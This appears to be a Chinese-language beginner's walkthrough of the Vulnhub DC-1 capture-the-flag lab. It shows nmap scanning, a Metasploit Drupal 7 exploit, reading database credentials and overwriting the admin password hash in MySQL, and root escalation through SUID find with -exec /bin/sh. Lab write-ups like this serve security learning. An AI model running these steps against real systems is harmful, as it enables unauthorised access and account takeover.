Vulnhub DC-1

Vulnhub DC-1

第一次接触渗透。全程按照师傅操作。

预备

导入被攻击机，配置网络为同一模式，保证和kali在同一网段。已知共5个flag。

渗透

nmap -sP 192.168.9.0/24

找到被攻击机ip之后进行端口扫描

nmap -p- 192.168.9.130

发现开启22端口和80端口

根据wapplyzer插件可知cms为drupal 7

尝试msf

msfconsole#启动msf
search drupal#搜索漏洞
use 1#选择漏洞
show options
set RHOSTS 192.168.9.130#设置空余选项
exploit#启动攻击
shell
python -c 'import pty;pty.spawn("/bin/bash")'#启动交互式

拿下第一个flag

Every good CMS needs a config file - and so do you.

提示配置文件，进入站点目录sites

在settings.php中拿到flag2

 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?

下面可以看到数据库信息，尝试连接数据库

mysql -udbuser -pR0ck3t

尝试修改admin密码来登录后台。去找加密逻辑。

在scripts文件夹下的password-hash.sh找到加密逻辑，运行尝试替换。

出现报错如下

www-data@DC-1:/var/www/scripts$ ./password-hash.sh "123456"
./password-hash.sh "123456"
PHP Warning:  include_once(/var/www/scripts/includes/password.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(): Failed opening '/var/www/scripts/includes/password.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(/var/www/scripts/includes/bootstrap.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 84
PHP Warning:  include_once(): Failed opening '/var/www/scripts/includes/bootstrap.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 84
PHP Fatal error:  Call to undefined function user_hash_password() in /var/www/scripts/password-hash.sh on line 87

说明password.inc不在目录下，将整个includes文件夹复制到scripts目录下重新执行即可。或者用root选项执行指定drupal根目录即可解决问题

www-data@DC-1:/var/www/scripts$ ./password-hash.sh --root "/var/www" "123456"
./password-hash.sh --root "/var/www" "123456"

password: 123456                hash: $S$DhKZsxG0S3dHz/X37deB08I7W/2PsIRFeZ6Tc5cQ29SRRFLxXVau

更行数据库登录后台

update users set pass='$S$DhKZsxG0S3dHz/X37deB08I7W/2PsIRFeZ6Tc5cQ29SRRFLxXVau' where name = 'admin';

由于我之前瞎试了超过5次，会锁ip一段时间，可以在数据库输入truncate flood就可以再试了。

在后台content中发现flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

提示看shadow文件，需要进行提权。

提权

find / -perm -4000 2>/dev/null

查看具有suid权限程序。发现find具有suid权限，利用find命令进行提权

touch tourist
find / -name tourist -exec "/bin/sh" \;

在根目录下拿到flag5

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

对于flag4在/etc/passwd中发现存在flag4用户，进入flag4家目录即可得到flag4。

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?